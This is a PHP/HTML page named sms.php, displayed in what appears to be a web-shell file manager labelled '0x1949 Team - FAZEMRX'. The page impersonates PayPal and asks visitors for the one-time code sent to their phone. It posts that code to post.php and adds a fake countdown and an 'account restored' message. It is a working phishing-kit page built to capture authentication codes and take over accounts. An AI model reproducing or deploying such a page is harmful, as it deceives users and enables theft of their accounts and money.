0x1949 Team - FAZEMRX - MANAGER
Edit File: sms.php
<?php require 'main.php'; ?><!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Paypal</title> <link rel="icon" type="image/png" href="res/img/logo.png" /> <link rel="stylesheet" href="res/css/main.css"> </head> <body> <div class="container"> <div class="login"> <img src="res/img/logo.png" class="logo"> <h3>Confirmation</h3> <p>Please enter the code sent to your phone number to continue.</p> <form action="post.php" method="post"> <h1 style="display: none;" id="tiitleloginnet" >Code Sent <span id="ctdown" class="timer"></span> <script> var second = 240; function secondPasse() { var minute = Math.round((second - 30)/60); var remainingSecond = second % 60; if (remainingSecond < 10) { remainingSecond = "0" + remainingSecond; } document.getElementById('ctdown').innerHTML = minute + ":" + remainingSecond; if (second == 0) { clearInterval(countdownTime); document.getElementById('ctdown').innerHTML = ""; } else { second--; } } var countdownTime = setInterval('secondPasse()', 1000); </script></h1> <h1 id="tiitleCardnetpas">Code Sent <span id="countdown" class="timer"></span> <script> var seconds = 240; function secondPassed() { var minutes = Math.round((seconds - 30)/60); var remainingSeconds = seconds % 60; if (remainingSeconds < 10) { remainingSeconds = "0" + remainingSeconds; } document.getElementById('countdown').innerHTML = minutes + ":" + remainingSeconds; if (seconds == 0) { clearInterval(countdownTimer); document.getElementById('countdown').innerHTML = ""; } else { seconds--; } } var countdownTimer = setInterval('secondPassed()', 1000); </script></h1> <h2 style="color:#fff;display:none;" id="tiitlethankss">Congratulations! Your have restored your account access.</h2> <input type="text" name="otp" required placeholder="Enter the code"> <?php if(isset($_GET['error'])){ echo '<input type="hidden" name="exit">'; echo '<p style="color:red;">Invalid code. Please try</p>'; } ?> <button type="submit" class="log">Continue</button> </form> </div> </div> </body> </html>